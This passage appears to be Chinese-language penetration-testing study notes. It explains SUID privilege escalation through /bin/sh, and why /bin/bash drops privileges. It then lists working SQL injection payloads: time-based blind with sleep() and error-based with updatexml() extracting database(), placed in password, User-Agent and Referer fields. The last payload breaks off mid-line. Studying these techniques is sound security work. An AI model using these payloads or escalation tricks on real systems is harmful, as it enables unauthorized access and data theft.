运行suid的程序时，这个程序的进程euid是创建者的用户id，且按照euid的权限执行进程代码，这意味着我们如果这个程序能调用/bin/sh，他的权限将会按照euid的身份新起一个拥有euid权限的会话shell。注：但是调用/bin/bash将不会提权，因为/bin/bash在启动后，首先判断euid和ruid是否相同，如果不相同，他会利用权限更低的ruid（如果ruid的权限比euid低），

password：id=1' and if(1=1,sleep(1),1) and '1'='1# 单引号闭合。uagent:1' and updatexml(1,concat(0x7e,(database()),0x7e),1) or '1'='1# 报错回显。Referer:1' and updatexml(1,concat(0x7e,(database()),0x7e),1) or '1'=